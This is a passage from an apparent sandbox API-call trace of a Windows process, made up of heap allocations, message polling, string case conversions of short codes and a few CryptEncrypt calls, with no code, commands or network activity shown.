dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0188.048] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0188.048] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x7acb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x7ad0) returned 1 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a9b20 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.049] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0188.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.050] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0188.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0188.051] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0188.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0188.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0188.052] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0188.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.052] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.053] CharLowerBuffW (in: lpsz="byte[31440]", cchLength=0xb | out: lpsz="byte[31440]") returned 0xb [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0188.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0188.054] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.055] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0188.056] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0188.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.056] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0188.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.056] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0188.056] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0188.058] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.058] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0188.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0188.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.059] CryptEncrypt (in: hKey=0xaa5960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24e7008*, pdwDataLen=0x8bef68*=0x7acb, dwBufLen=0x7ad0 | out: pbData=0x24e7008*, pdwDataLen=0x8bef68*=0x7ad0) returned 1 [0188.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a9b20 [0188.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0188.059] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0188.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.060] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.060] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0188.061] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0188.061] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.062] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0188.064] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.064] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0188.064] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.064] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.065] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0188.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.065] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0188.065] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0188.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.065] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0188.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.065] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0188.065] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0188.066] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0188.066] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0188.066] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0188.066] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0188.066] PeekMessageW (in: 